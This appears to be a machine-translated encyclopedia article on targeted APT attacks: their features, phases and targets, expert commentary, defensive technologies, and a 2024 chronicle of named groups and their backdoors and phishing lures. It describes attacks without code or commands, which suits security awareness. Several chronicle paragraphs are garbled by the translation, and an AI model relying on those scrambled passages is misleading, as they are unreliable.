RSS
Логотип
Баннер в шапке 1
Баннер в шапке 2
2024/11/29 15:52:21

Advanced Persistent Threat (APT) Targeted or Targeted Cyber Attacks "Advanced Sustained Threat"

The peculiarity of targeted attacks (APT) is that attackers are interested in a particular company or government organization. This distinguishes this threat from massive hacker attacks - when a large number of targets are attacked at the same time and the least protected users become victims. Targeted attacks are usually well planned and involve several stages - from reconnaissance and deployment to the destruction of traces of presence. As a rule, as a result of a targeted attack, attackers are fixed in the victim's infrastructure and go unnoticed for months or even years - throughout this time they have access to all corporate information.

Content

Classification difficulties

Targeted or targeted attacks - attacks directed at specific commercial organizations or government departments. As a rule, such attacks are not widespread and a fairly long period is being prepared. Attackers study the information systems of the attacked object, find out which software is used for certain purposes. The objects of the attack are specific information systems and/or people very limited by any framework or goals. Malware is specially developed for an attack so that standard antiviruses and defenses used by the object and well-studied by attackers cannot detect a threat. Most often these are zero-day vulnerabilities and special algorithms for communicating with the perpetrators/customers of the attack.

Yuri Cherkas, head of infrastructure information security solutions at the Information Security Center of Jet Infosystems, believes that the almost constant controversy surrounding the definition of the term "targeted attack" makes it difficult to classify this term. He notes that the targeted attack uses the same hacking mechanisms as any other (spam, phishing, infection of frequently visited sites, etc.). "In my opinion, one of the main signs of a targeted attack is its clear focus on a specific organization. For example, a virus written for a specific software developed by a specific organization. But this does not always happen. A hacker can use the exploit kits he has and other tools to attack the victim company. In this case, it is quite difficult to determine whether the attack is targeted, since vulnerabilities of common OS and application software were used to carry out the attack, "says Yuri Cherkas.

Difficulties in qualifying targeted attacks are one of the factors that do not allow calculating even their approximate number.

NOS (Complex Long-Term Threats)

Cybercrime category with business and policy goals

Most experts agree on the following features of the target so-called[1]:

  • These are attacks aimed at specific commercial organizations, industries or government departments.
  • The objects of the attack are specific information systems that are very limited in any framework or purpose.
  • These attacks are not widespread and a fairly long period is being prepared.
  • Malware, if used in the implementation of an attack, is specially developed for a specific attack so that standard defenses, well-studied by attackers, cannot detect its implementation.
  • Zero-day vulnerabilities can be used to implement the attack.
  • Typically, targeted attacks are used to steal information that is easy to monetize, or to disrupt availability to critical information.
  • When carrying out a targeted attack, the same hacking mechanisms are used as in mass attacks, in particular phishing. The difference is the preparation of an attack in order to prevent the possibility of its detection by means of protection. It is in relation to targeted attacks that phishing becomes a very relevant threat, since the attack in this case is carried out not on abstract, but on specific individuals, which can be taken into account by social engineering methods.
  • After the detection and identification of the target attack, already following the results of its implementation, the threat of this attack becomes known, it goes into the category of "massive" - it can be massively used by attackers. At the same time, as identified, the threat of this attack can already be detected by means of protection, one of the tasks of which is to ensure the minimum duration of the transition of the threat of an attack from the category of target to mass.

Target Attack Phases

Course of APT attack

Attack targets

According to A.T. Kearney:

  • Company Board Office. Often, the equipment is improperly protected from physical damage (for example, from cleaning or maintenance personnel).
  • R&D. This is usually the department that requires the highest level of protection, but often it is no better protected than other departments.
  • Data centers provide a reliable environment for hosting a private cloud. The problem is ensuring the safe operation of numerous servers, as well as applications running on these servers.
  • Network of suppliers. Due to the expanding application of network solutions when working with suppliers, there are risks associated with the fact that relatively small supplier companies are generally less protected.
  • Cloud computing. Basically, it is safe to use an external cloud. The problems are related to the fact that the level of data protection depends on the law and that access from the special services is possible.
  • Production. Many old specialized systems are increasingly combined into networks, and their work is difficult to track and control. Malicious attacks in this case can lead to production losses or even to the collapse of the company.
  • Data Base provide secure storage of sensitive information. The main weakness is that hackers can use administrators as "tools" for penetrating databases.
  • End products activated with information technology. The increasing use of network solutions to ensure the functioning of end products facilitates cyber attacks. By remotely monitoring user devices in order to provoke breakdowns, hackers have the opportunity to illegally receive confidential information through these devices. In this regard, the company may face the loss of reputation and receiving claims from users who are victims of fraud
  • Office networks. The growing level of network interaction, involving the unification of almost all systems, provides a hacker with rich opportunities if he can penetrate the network
  • Sales. Leaking marketing plans, pricing and customer information undermines the company's reputation and robs it of competitive advantage.
  • Mobile devices. When buying smartphones available in the commercial market, users often enter confidential data into their memory, which, as a rule, can be easily stolen by hackers. The most tested and reliable security concepts can be useless if the company's employees use their own mobile devices to solve work tasks.
  • Online retailers. To illegally access under the guise of real buyers and commit fraudulent actions, hackers use credit card details and personal data of customers.
  • Phone calls. By exploiting people's willingness to help each other, attackers can use phone calls as a way to easily get the information they need.

Targeted attacks in the financial sector

The review of unauthorized transfers of funds in 2014 , published by the Central Bank of the Russian Federation the day before, notes that 23 credit organizations reported incidents with signs of targeted attacks. Experts calculated that the incidents were aimed at writing off funds in the amount of 213.4 million rubles.

All incidents are related to the external impact on the IT infrastructure, including the introduction of malicious code, thanks to which high-tech criminals intended to withdraw funds.

Hacking attempts have typical features: the attack was targeted and took into account the features of the processes of sending and processing messages in a certain payment system; in some cases, malicious code was not detected by standard anti-virus protection tools, despite the current anti-virus databases; also recorded the facts of hackers entering the local networks of banks in order, including through attempts to inject malicious code through electronic messages.

Representatives of banks state: if earlier fraudsters preferred to rob customers, now they have switched to larger production, namely to the financial and credit institutions themselves.

"
It's a more complicated procedure, but in terms of benefits, it's more convenient for hackers to hack into banks where money is in one place. The main trend is the so-called targeted attacks. They are prepared for months and in relation to specific banks and financial organizations. This is a real threat from which it is very difficult to protect even banks advanced in terms of information security. The attackers have studied banking software, ABS, protective equipment and so on quite well, "said Yuri Lysenko, head of the information security department of Home Credit Bank
.
Stanislav Pavlunin, vice president of security at Tinkoff Bank, agrees with him: "Targeted attacks go side by side with social engineering. DDoS attacks have not disappeared anywhere, but working with them is much easier than with viruses that attackers write for targeted actions. Standard antiviruses do not detect malicious objects that are written for the attack object. Systems that allow you to record such targeted attacks on a specific financial organization and identify risks on the fly are a different security class, "says Stanislav Pavlunin.

At the same time, Yuri Lysenko predicts an increase in the number of targeted attacks on specific banks and financial organizations, remote banking systems, etc.

Target Attack Techniques

Publicly available information about the means of conducting targeted attacks and incident investigation (which have signs of targeted attacks) allows us to talk about a variety of methods. For example, fully automated methods can be used, as well as phone calls.

Attackers during the attack explore various possibilities to gain access to the necessary information. Direct physical access can be carried out or employees of the company, their devices and accounts in Internet services can be attacked.

"A significant problem is the security of related information systems - vendor companies (especially software developers supporting their product) and customers. Trusted relationships with them can be used to bypass boundary defenses. This significantly expands the already complex perimeter of protection, "says Alexey Kachalin, Deputy General Director of Promising Monitoring.

The victim is unlikely to be able to get away from attempts at targeted attacks. For example, an attacker wants to gain access to the internal resources of the company of interest to him. For this purpose, an attacker can initiate many targeted attacks, over several months or years. All attack elements (network attacks, malware) can be pre-checked for "visibility" for common detection methods. In case of inefficiency, such elements are modified. Similar to updating antivirus databases, intrusion tools can be updated, including those that are already operating in the captured system.

Additional complexity is the duration and intensity of the targeted attack. Preparation can take months, and the active phase can take minutes. "There is a possibility that sooner or later the attack will succeed. In the end, the problem of 0-day vulnerabilities is always relevant. If you have information that costs 100 million, then be prepared for the fact that there is someone ready to spend 50 million to steal it. Therefore, the only thing that can be done is to be ready for compromise and have tools for quickly detecting an attack, suppressing it and minimizing damage, "said Alexander Gostev, chief antivirus expert at Kaspersky Lab.

Establishing the organizers

Most of the targeted attacks are detected after the fact. The biggest problem remains attribution - the establishment of the organizers and perpetrators of such attacks.

Identifying the culprit is an extremely difficult task, experts are sure. In this process, it is necessary to collect the maximum number of factors that would indicate the involvement of a hacker group of a certain nationality or organization in the commission of a crime. This requires interaction between companies working in the field of information security, victims, law enforcement agencies of different countries, etc. But in this case, only a few culprits are installed, most often due to gross errors of the attackers.

"Many
factors must be considered to determine the source of the attack. First of all, this is an analysis of the code - it may contain words that indirectly indicate the language or nationality of the authors. For example, Russian words written in Latin, or errors that are usually characteristic of Russian authors, etc. However, cybercriminals can deliberately leave such false traces, thereby confusing the investigation, "said Alexander Gostev
.

More than 100 groups purposefully attack commercial and state organizations

Experts from the Kaspersky Lab Global Center for Threat Research and Analysis reported in the summer of 2016 that more than 100 groups organizing cyber espionage and ART-class attacks are active in the world, and commercial and government organizations in 85 countries are targeted.

According to company representatives, such a dynamic development of this threat suggests that targeted attacks have ceased to be the lot of the chosen ones: attackers optimize their equipment and tools, and this reduces the cost and simplifies the organization of a malicious campaign, which, in turn, contributes to the emergence of new players.

The main purpose of the ART class attack is to steal confidential information, which can subsequently be used to gain geopolitical advantage or sell to interested parties. According to Kaspersky Lab's observations, government and diplomatic organizations, financial companies, enterprises operating in the energy and space industries, health and education institutions, telecommunications and IT companies, suppliers for the armed forces, as well as public and political activists are most at risk of becoming a victim of a targeted attack.

"
We have been studying complex targeted attacks for more than six years and can say with confidence that recently they have been increasingly used not only for espionage, but also for theft of money. Targeted attacks affect a variety of organizations, their victims can be not only government agencies. Of no less interest to cybercriminals are large companies that have valuable intellectual property or have access to large financial assets, "said Yuri Namestnikov, head of the Russian research center at Kaspersky Lab. - In such a situation, early detection of a targeted attack is critical for any organization that wants to keep its sensitive data. However, with traditional security solutions, this is very difficult to do, since attackers often use non-trivial methods and carefully hide their activity. So companies can be helped by either analytical services or special solutions to identify targeted attacks. "

Methods to Protect and Prevent Attacks

The main means of protection against targeted attacks today are means of detecting all kinds of anomalies (code, commands, behavior, etc.). At the same time:

  • Detection of anomalies within a single computer, or corporate IS as a whole, is carried out in order to detect implemented, as well as partially or fully implemented attacks.
  • It is possible to neutralize known attacks at early stages of their implementation - the task of information protection is solved, which is ensured by the possibility of unambiguous identification of the detected anomaly as an attack implementation event, as a result, automatic response to the detected abnormal event.
  • With regard to unknown attack threats, which include threats of targeted attacks, anomaly detection is inevitably associated with errors of the first (during surface analysis of events) and second (during deep analysis) kind. In this case, especially in deep analysis, and otherwise there is no sense in detecting anomalies, it is technologically impossible to unambiguously identify the detected anomaly as an attack implementation event, as a result of which an automatic response to a registered event is impossible, which can only with some probability be an attack. The task of detecting anomalies in this case comes down not to protecting information, but to conducting an appropriate further study on the recorded fact of the implementation of the attack, in order to identify the attack as quickly as possible.
  • After unambiguous identification of the anomaly as attacks (the attack becomes known, and its threat is no longer a target threat, but a mass attack threat), information protection is already being implemented with respect to this attack by an anomaly detector.


Almost all vendors have a product in their line that is positioned as a means of protecting against targeted attacks. These include FireEye, CheckPoint, McAfee, etc. The effectiveness of protection against targeted attacks cannot be fully determined only by the technical means used.

"If we talk about technical means, then their effectiveness will be considered through the prism of the goals and objectives set by the company, which is better to evaluate as part of pilot projects in a specific environment. Like any solutions, products for protection against targeted attacks have both their strengths and weaknesses, "said Alina Sagidullina, information security consultant at LANIT-Integration.
Information security monitoring centers have the ability to quickly respond to targeted attacks. Such centers can comprehensively analyze the state of the attacked system through information protection systems; with the help of experts focused on information security analysis in the observed system; when monitoring the facts of compromise and information leakage; aggregate analysis of large information systems. "This allows you to see similar signs of anomalies in various segments of the information system," says Alexey Kachalin.

There have been technologies for protecting against targeted attacks before, but now they are reaching a new level. First of all, we are talking about various tools for detecting anomalies - both on local computers and at the level of network activity. The task of such systems is to search for everything unusual that happens, and not search for a malicious year. This is because in many cases, attackers may not use malware at all.

"To these systems is added the actively developing class SIEM -" Security information and event management, "which allows you to aggregate incoming system events from different security systems (antiviruses, firewalls, emulators, routers, etc.) and see in real time all the changes taking place," says Alexander Gostev.

Why Traditional Security Systems Are Not Enough

Due to the specifics of targeted attacks and preparation for them, such as:

  • a detailed study of the protective equipment used in order to bypass them;
  • writing unique software and fixing it in the target infrastructure;
  • use of trusted but compromised objects in attacks that do not create a negative background;
  • multivector approach to penetration;
  • stealth, etc.

Due to the inherent technological limitations of traditional means of protection:

  • detection is aimed only at common (simple) threats, already known vulnerabilities and methods;
  • no built-in mapping and correlation of detections into a single chain of events;
  • there are no technologies for detecting deviations in normal activities and analyzing the operation of legitimate software.

An integrated approach is needed

Deception-traps

New funds have appeared and continue to appear. However, their effectiveness directly depends on the quality of their customization. According to Yuri Cherkas, the main technological directions of protective equipment are:

  • sandboxes that mimic the organization's workstations. In sandboxes, files received from the Internet are launched and analyzed. If the file being run entails a destructive effect, then such a file is defined as infected;
  • analysis of abnormal network activity (for example, based on NetFlow), which is carried out by comparing the current network activity with the built reference model of network behavior. For example, a computer or server that always communicates with some set of certain network resources over certain protocols suddenly suddenly begins to try to access databases directly;
  • behavioral analysis of workstations, also based on comparison of workstation activity with reference model. The difference is that this analysis is carried out not at the network level, but at the workstation level itself using agents. Not so long ago, an interesting technology appeared that monitors Windows processes. In case of deviation from the reference model, the Windows process is blocked, thereby preventing the exploit from performing a destructive effect.

"The nuance
is that all these technologies involve behavior analysis. In this case, errors of the 1st (false positives) and 2nd kind (false negatives) are inevitable, so efficiency strongly depends on the qualifications of employees who configure and exploit these solutions, "notes Yuri Cherkas
.
Targeted Attack Protection Components

Deception - a network of masked network traps and decoys that are scattered throughout the IT infrastructure

How an attacker acts: Hackers on your network are constantly moving towards their goal

What Deception will provide

  • Real-time detection of targeted and zero-day attacks
  • Protect real IT assets by switching attacker activity to traps
  • Protecting valuable data from "ransomware"
  • Collection of penalties about the actions of intruders
  • No false positives
  • Does not use agents or affect users and IT services

Targeted Attack Protection Components

Results

  • Attacker Profile
  • Detailed methods and tools used during an attack
  • In-depth analysis (what goals hackers are pursuing, what information they are looking for)
  • History and timeline of the hack
  • Sources of origin of attackers based on their IP addresses and DNS data

Damage from attacks is a big mystery even for victims

Calculating the real damage from targeted attacks does not seem real: according to ESET‬, 66% of security incidents go unnoticed for many months. It is for this that the complex malicious PO‬ for targeted attacks is "sharpened": data theft occurs imperceptibly, in the "background" mode.

A large number of attacks go unnoticed. When found, many companies try to hide the fact of the incident and not make it public. Kaspersky Lab believes that at least one high-profile target attack becomes known in the world every week. In reality, more than a hundred such high-profile attacks can occur a week.

In a 2013 FireEye study, 39.5 thousand unique incidents were detected by their devices, 4.1 thousand attacks were associated with APT. At the same time, Russia was not included in the TOP-10 of countries targeted by most APTs. This can most likely be explained by the data sources used.

The number of targeted attacks in the world at the end of any year is quite difficult to estimate. Alexander Gostev, notes that tens of thousands of incidents with targeted attacks can be committed in the world per year. "Russia is in a global trend and large Russian companies and government agencies, according to my estimates, are subjected to attempts at targeted infection at least once a month," he notes.

Chronicle

2024

TaxOff group uses complex backdoor in attacks on Russian public sector

Specialists of the Threat Research Department of the Positive Technologies Security Expert Center (PT Expert Security Center) have discovered an APT group that attacks organizations of the Russian public sector. In a recorded series of incidents, attackers used phishing emails on finance and rights to penetrate the IT infrastructure - in this regard, experts called the TaxOff group. Cybercriminals used a high-tech backdoor in attacks, which can remain invisible even when performing many tasks at the same time. Positive Technologies reported this on November 28, 2024.

The group pursued two main goals - espionage and consolidation in the infrastructure to develop further attacks. Experts found several phishing emails that were used as initial penetration vectors. One of them had a link to cloud storage with malicious content, the other - a fake installer of special software for civil servants, designed to fill out various certificates.

Interaction with letters led to infection with a complex backdoor - experts called it Trinper. The malware is written in C++ and has a multithreaded architecture, which allowed it to perform various actions in parallel: collect and upload data, monitor the file system for sensitive data, and communicate with the command and control server. The backdoor implements a configuration that provides flexible Trinper configuration. In addition, the backdoor caches frequently used data and thereby performs operations faster, increasing its performance.

File:Aquote1.png
Thanks to multithreading and other architectural features, Trinper gives attackers the ability to gain steady access to compromised systems and simultaneously perform numerous malicious actions. At the same time, the backdoor does not have a significant impact on infrastructure performance, so it can go unnoticed for a long time, "said Vladislav Lunin, senior specialist at the Complex Threats Research Group, a security expert center at Positive Technologies. - Combining high-tech malware with bait on exciting topics makes TaxOff attacks especially dangerous and difficult to detect. This highlights the need to regularly raise awareness among organization employees of current cyber threats and build tiered protection against complex incidents.
File:Aquote2.png

In order not to become victims of such attacks, experts advise users to comply with the standard rules of cyber hygiene: carefully read emails from any senders, do not open suspicious attachments and do not follow dubious links, even if the topics of messages are extremely relevant. Experts recommend that companies carefully check network traffic in order to detect hidden cyber threats in a timely manner.

APT group PhaseShifters attacks Russian companies with steganography

Specialists from the Threat Research Department of the Security Expert Positive Technologies Center (PT Expert Security Center) have discovered scenarios attacks aimed at industrial the Russian state institutions companies and research centers. The company announced this on November 1, 2024. Dozens of organizations became victims. The attackers used the increasingly popular steganography technique, which allows you to hide malware in forwarded images and text. files Experts note that cybercriminals they almost exactly repeat the scenarios of the attacks of the TA558 group - Positive Technologies reported on it in April 2024.

According to PT ESC experts, the discovered facts of attacks were carried out by a well-known espionage group, whose attention is directed to various industries in Eastern Europe, including government agencies, the economy and industry. Positive Technologies experts attributed the attacks as committed by the PhaseShifters group (also known as Sticky Werewolf). In their attacks, the group uses phishing: attackers send letters allegedly from officials asking them to familiarize themselves with the document and sign it. As a result, malware such as Rhadamanthys, DarkTrack RAT, Meta Stealer, and others hit devices.

Cyberattacks began by sending phishing emails with attachments in the form of password-protected archives that contained malicious files. The study examined dozens of documents, among which there were, for example, summaries or additional agreements for signature. When the victims opened the files, scripts downloading images were downloaded to their devices - the payload was hidden in them using steganography. Experts suggest that PhaseShifters could borrow this technique from the TA558 group, which attacks organizations around the world by November 2024. Further analysis of attack chains led the researchers to an even more interesting conclusion. The same technique and the same crypter is used by UAC-0050 (UAC-0096) - a group, according to a number of researchers, since 2020, attacking organizations in Russia, Ukraine, Poland, Belarus, Moldova, and the Baltic countries.

File:Aquote1.png
We have seen high activity of the PhaseShifters group since the spring of 2023 (other Russian researchers later called it Sticky Werewolf) and even then noticed interesting details. The attacks of the group by technique are identical to the chains of attacks of another group - UAC-0050. Moreover, the attacks of these groups take place with a short time period, that is, the attackers attack equally within a few weeks, "said Denis Kuvshinov, head of the TI department of the Positive Technologies security expert center. - We tend to believe that UAC-0050 and PhaseShifters are the same group, but this can only be confirmed after a longer observation.
File:Aquote2.png

Experts at the Positive Technologies security expert center recommend that users take a closer look at letters with attachments, even if they are sent on behalf of well-known companies or government organizations. Companies should closely monitor network traffic, as well as check suspicious activity related to legitimate services, especially using PowerShell command shells, CMD and scripting environments, such as WScript.

Cybercriminals attack the public sector, telecommunications and military-industrial complex of Southeast Asian countries

Positive Technologies on July 25, 2024 published a study of the activities of APT groups attacking organizations in Southeast Asia. The Philippines and Vietnam accounted for the most attacks in the region. The three most attacked industries in the region included government agencies, telecommunications companies and the military-industrial complex.

According to the study, the top 5 countries in the region in terms of the number of attacking APT groups include the Philippines (85%), Vietnam (85%), Thailand (70%), Malaysia (70%) and Indonesia (60%).

File:Aquote1.png
Southeast Asia is an important territory both in terms of the global economy and geopolitics. We analyzed the activities of 20 APT groups that attacked Southeast Asia for the period from January 2020 to April 2024. All of them are aimed at state organizations in the region. Telecommunications companies are also under attack, they are attacked by 60% of APT groups, respectively, and every second group takes actions aimed at organizing the military-industrial complex. In addition, more than a third of cybercriminal groups are attacked by enterprises from the fields of science and education (45%), industry (40%) and finance (35%), - said Yana Avezova, senior analyst at the Positive Technologies research group.
File:Aquote2.png

Telecommunications is also under scrutiny by attackers, including through the proliferation of 5G technology in the region. With the pace of technology adoption in Southeast Asia outpacing that of cybersecurity, the rapid rollout of 5G telecommunications could increase the rise of cyberattacks on the industry.

As Positive Technologies analysts found out, three-quarters of the APT groups investigated start cyber attacks with phishing mailings, and half of them exploit vulnerabilities in public systems, such as Microsoft Exchange servers. Phishing campaigns, according to the study, are often tied in time to significant events for the region, including ASEAN summits. A number of APT groups (30%) use a watering hole attack as an initial step, placing scripts on websites that quietly download malware to visitors' computers.

Having penetrated the network, attackers begin to explore the environment in which they find themselves. According to Positive Technologies experts, the majority (80%) of APT groups seek to identify users of compromised nodes. This information can be used to elevate privileges or promote in the infrastructure. Of the APT groups examined, 70% collect network configuration data, as well as browse files and directories for useful information. Another 60% of APT groups study processes running on the node, which helps them to get an idea of ​ ​ the installed protections.

The arsenal of APT groups studied by experts has many tools, including unique software of its own design. At the same time, they all use legitimate tools in attacks that are already in the compromised system. This allows them to disguise their actions as those of IT staff and avoid detection. So, 70% of APT groups use Cobalt Strike - commercial software that was created as a tool for penetration testing, but the extensive functionality of which is now actively exploited by cybercriminals. For example, the Earth Longzhi subgroup of the group APT41 in attacks on organizations in the Philippines, Thailand, Malaysia and Indonesia used special versions of Cobalt Strike bootloaders with complex detection protection mechanisms. Together with other techniques, this allowed attackers to remain unnoticed in the infrastructure of the victims from September 2021 to June 2022.

To combat complex targeted attacks and build an effective defense system, Positive Technologies experts recommend that organizations pay attention to the basics of an effective cybersecurity approach, which include:

Inventory of IT assets

  • monitoring and response to incidents;
  • improving employee cyber literacy;
  • security assessment.

APT group HellHounds attacks Russian organizations for the third year in a row

Positive Technologies experts on May 23, 2024 published the results of their next study of the activities of the HellHounds APT group, which is actively attacking Russian organizations in critical areas. The number of victims as of May totaled dozens of organizations in such industries as IT, transport, power, etc. Government agencies and aerospace companies were also affected.

Positive Technologies specialists discovered HellHounds in November 2023: even then it actively attacked the infrastructure of Russian companies using a backdoor for Linux Decoy Dog. A recent study by the company showed that it also has a Windows version. The first attacks using Decoy Dog for Windows were noted on January 1-2, 2024.

Decoy Dog fragment

Decoy Dog is a derivative of the Pupy RAT open source project. Judging by the samples intercepted by the researchers, the development of Decoy Dog began no later than the end of 2019, and the latest sample is dated January 2024.

Decoy Dog (Windows) Detail Diagram

In turn, SSL certificates, which are used in the backdoor to encrypt connections to the command server (remote nodes), are dated 2021-2023. This may be followed by the fact that the campaign against Russian enterprises was launched in 2021.

As for penetration methods, researchers write that in at least two cases, attackers used the infrastructure of contractors to get into the networks of target organizations. At the same time, there was a compromise of credentials data for logging in via the protocol. SSH

There are also cases when attackers disguised Decoy Dog samples as ISO images of the iMind service for online meetings, video conferencing and webinars.

In total, the Positive Technologies study confirmed 48 successful attacks. Attackers are actively attacking Russian IT companies - primarily contractors of critical organizations. Presumably, the attackers are targeting these companies to carry out trusted relationship attacks, the researchers said.

Distribution of victims by industry

File:Aquote1.png
"The success of such attacks testifies to the weak or absent protection of affected companies from trusted relationships (their special case)," said Anastasia Melnikova, director of information security at SEQ. - And this, in turn, is a sign of an uneven attitude towards the information security of the critical infrastructure as a whole. Any system is reliable just as much as its weakest link is reliable. In fairness, 48 successful attacks in three years of targeted activity - not so much, but - much more than it should be. "
File:Aquote2.png

The attackers manage to maintain a presence in critical Russian organizations for a long time.

File:Aquote1.png
"Despite the fact that almost all Hellhounds tools are based on open-source projects, attackers manage to modify it with sufficient quality, which contributes to bypassing the means of protection and a long hidden presence in compromised organizations," the researchers noted.[2]
File:Aquote2.png

Russian companies are being spied on

Cyberplacement group Sapphire Werewolf rewrote an open-source steeler to spy on Russian companies. Since the beginning of spring 2024, the group has attacked Russian companies more than 300 times. This was announced on May 28, 2024 by the press service of the State Duma deputy RFAnton Nemkin.

During the monitoring of cyber incidents, it became known that the group of attackers Sapphire Werewolf sent phishing letters to employees of Russian companies containing links created by the T.L.Y shortening service. Users believed that they were downloading an official document, but instead downloaded. harmful virus When trying to open it, a malicious one was installed in the PC system, the software purpose of which was theft (data Amethyst styler), the press service said. BI.ZONE

At the same time, in order not to arouse additional suspicions at the same time as downloading the viral one, ON a distracting document was really opened on the PC - a decision to initiate enforcement proceedings, a leaflet from the CEC or a presidential decree. And Amethyst of the Russian Federation at the same time collected an important one from a compromised device. information For example, databases passwords cookies, browser history, saved pages, text and other documents, noted in. BI ZONE.

File:Aquote1.png
The danger of steelers is that, being encoded, they can easily bypass antivirus protection. It is due to this quality that this type of attack spreads especially quickly. I think that steelers are one of the key threats to information security for both ordinary users and organizations. At the same time, there are many options for steelers. For example, a styler can mimic an application or browser extension, or a zip archive. In fact, for any downloadable file, - said the deputy.
File:Aquote2.png

According to Nemkin, the distribution of steelers, as a rule, occurs at the expense of phishing tools.

In 2023, the Rare Wolf group of attackers launched at least 90 attacks with a similar scenario, Nemkin recalled.

File:Aquote1.png
In addition, it is important to constantly monitor systems for malware, as well as create autonomous backups. Finally, the main preventive measure to prevent such attacks is the development of digital competencies of personnel. It has been noted more than once that phishing is one of the key opportunities for gaining unauthorized access to system data. And the fault of this is the incompetence of employees who not only open suspicious letters, but also follow the links from them, - the deputy explained.
File:Aquote2.png

Pro-state group Shedding Zmiy attacked dozens of Russian organizations

Experts from the Center for Research on Cyber ​ ​ Threats of Solar the GC "" have identified the activities of the pro-state highly professional group Shedding Zmiy, which has been spying on the Russian organizations since at least 2022. On account hackers of several dozen on cyber attacks ,, and public sector industry telecom others. industries data They used the compromised in subsequent attacks, and also posted them publicly. About this "Solar" reported on May 24, 2024.

From 2022 to May 2024, Solar Group specialists have already investigated seven incidents related to Shedding Zmiy. At first, it seemed that the Cobalt group (exCobalt) was behind the attacks, since its "proprietary" CobInt backdoor appeared in the first incident investigated. However, further investigations revealed a difference in motive. Compared to Cobalt, which aimed for financial gain, the group, later named Shedding Zmiy, was not interested in money - it was hunting for data.

Although Shedding Zmiy tried to act differently in each attack than in the previous one, Solar Group experts quickly began to notice traces of the use of the same malicious techniques, tools, network infrastructure and component names. On these signs, seven seemingly different incidents were eventually combined into one cluster under the name Shedding Zmiy. As a result of the work, the specialists of the Solar Group helped the affected organizations get rid of traces of the presence of the group and gave recommendations on improving the cyber protection of IT perimeters.

Investigations have shown that the group poses a serious threat to Russian infrastructure. It applies both publicly available HPE and unique, designed specifically for specific purposes (including bootloaders, backdoors and web shells). Sometimes it uses compromised legitimate servers to download malware to the victim's systems. Also, hackers exploit a specific vulnerability not closed by the vendor in the ASP.NET: such attacks are difficult to identify and respond to.

In total, experts from the Solar Group found traces of the use of 35 different tools for reconnaissance, delivery, malware secretive horizontal movement within the network and data theft. To penetrate the network, elevate privileges and consolidate, the attackers exploited 20 known vulnerabilities in a common corporate one. ON

At the same time, Shedding Zmiy knows how to confuse traces. The group owns an extensive network of command servers in the territory, Russia rents resources from various - and hostingproviders on cloud platforms. This helps hackers bypass blocking attacks on a territorial basis (via GeoIP).

Shedding Zmiy is also actively resorting to highly professional social engineering. So for one of the attacks, hackers created a fake Telegram profile, posing as a specialist in the information security service, and "asked" a company employee for the password for the account. Using a compromised account, the attackers managed to visit several more hosts where they placed HPEs.

In addition, the group was seen exploiting trust relationships between organizations (attacks such as Trusted Relationship). In one of the cases, infecting the telecom provider's network, hackers tried to attack three more organizations by sending several dozen emails with malicious attachments from the hacked network.

File:Aquote1.png
In the process of investigations, we found both malicious tools familiar from the activities of the Cobalt group, and unique samples of HPE that had not been encountered before. In particular, the Bulldog backdoor and the XDHijack bootloader. In addition, the group has developed a whole framework for exploiting the VIEWSTATE deserialization vulnerability. All this speaks of the high professionalism of the attackers and the considerable resources that they invest in the development of their arsenal, "explained Anton Kargin, an expert of the HPE analysis group at the Solar Research Center.
File:Aquote2.png

Asian group Obstinate Mogwai exploits ten-year-old vulnerability in targeted attacks on Russian companies

Experts from the research center of cyber threats the GC "" Solar blocked the espionage activity the Asian of the Obstinate Mogwai group in the telecom operator's infrastructure. About this Solar GC "" reported on May 17, 2024. to the attack hackers In used the old, but not completely eliminated vulnerability by the deserialization vendor in the ViewState parameter (controls the state of the web pages of the ASP.NET environment developed). Microsoft It allows you to perform any actions in the attacked system - on server email Microsoft Exchange a ASP.NET.-based web page. At the same time, the very fact of its operation is extremely difficult to detect, and the response method has not yet been described in detail in specialized communities.

In late 2023 - early 2024, Solar experts investigated the APT attack of the Obstinate Mogwai group on a Russian telecom company, among whose clients are state authorities. In the course of work, experts found signs of successful exploitation of the ViewState parameter vulnerability, which has been known since 2014. It allows attackers to execute arbitrary code on the system and subsequently steal, replace or spoil data.

The investigation began after the means of protection recorded suspicious activity in the infrastructure of the telecom company. By that time, the attackers were already creating a "bridgehead" for stealing confidential data from the company itself and its customers. Several times, Solar experts found malicious grouping tools in the attacked network and removed them. But after a while, Obstinate Mogwai were returning until all paths were finally closed for them. For perseverance, the Solar team called the group Obstinate Mogwai ("stubborn demon").

To penetrate the network, hackers exploited the vulnerability of deserialization of unreliable data in the ViewState parameter of the environment ASP.NET. Serialization in programming is the process of converting the state of an object to a form suitable for storage or transmission, and deserialization is the process of inversely converting data to an object. This is necessary to optimize applications (for example, when they interact with each other). However, these processes often contain vulnerabilities that allow attackers to modify data and execute arbitrary code during deserialization.

The vulnerability was partially closed in 2014. Then the company, the Microsoft developer of the ASP.NET platform, added a MAC validation mechanism to its framework data during deserialization. But it turned out that attackers can bypass this mechanism if they know the ViewState validation keys. To obtain them, you need to either hack IIS server keys or get to it by hacking other parts of the organization's network. Perhaps realizing the complexity of exploiting the vulnerability, the manufacturer left it in the status of Won't Fix (will not be fixed). However, practice has shown that such targeted attacks are quite real - today at least 8 such cases are known in the world.

In this investigation, traces of the use of the ViewState deserialization vulnerability were discovered when attackers began to send serialized instructions to the attacked system to set certain settings (gadgets). In Windows log records, experts found that after deserialization, these instructions are executed. In accordance with the logic of the ASP.NET, validation keys are required for the successful operation of such gadgets. These circumstances indicated a possible vector of attack.

In addition, at a certain point, the gadget, which allowed attackers to remotely execute code using deserialization, stopped working correctly. Thanks to this event, Solar specialists were able to extract a malicious load from serialized data, understand how Obstinate Mogwai executed commands on the customer's server, and finally stop this activity.

File:Aquote1.png
This vulnerability has a curious status: on the one hand, it is old and not formally critical, which gives the impression of its relative safety. On the other hand, it gives attackers many opportunities to develop an attack. We did not find comprehensive instructions for detecting and suppressing attacks through ViewState in the public domain, so with the help of our research we want to close this gap, "said Anton Kargin, an expert in the HPE analysis group at the Solar Research Center.
File:Aquote2.png

Cybercriminals target telecommunications and military-industrial complex in the Middle East

Specialists from the Positive Technologies Security Center (PT Expert Security Center, PT ESC) conducted a comprehensive study of the activities of APT groups aimed at organizations in the Middle East. Experts noted that 88% of the groups studied attack Saudi Arabia, and the top 5 attacked industries include government agencies, industry, telecommunications, military-industrial and fuel-energy complexes. To gain initial access to the infrastructure, attackers mainly make phishing emails and exploit shortcomings in public applications. Positive Technologies announced this in March 2024.

According to the analysis, the top 7 targets of the attackers included Saudi Arabia (88%), the UAE (75%), Israel (63%), Jordan (56%), Egypt (50%), Kuwait (50%) and Lebanon (44%).

File:Aquote1.png
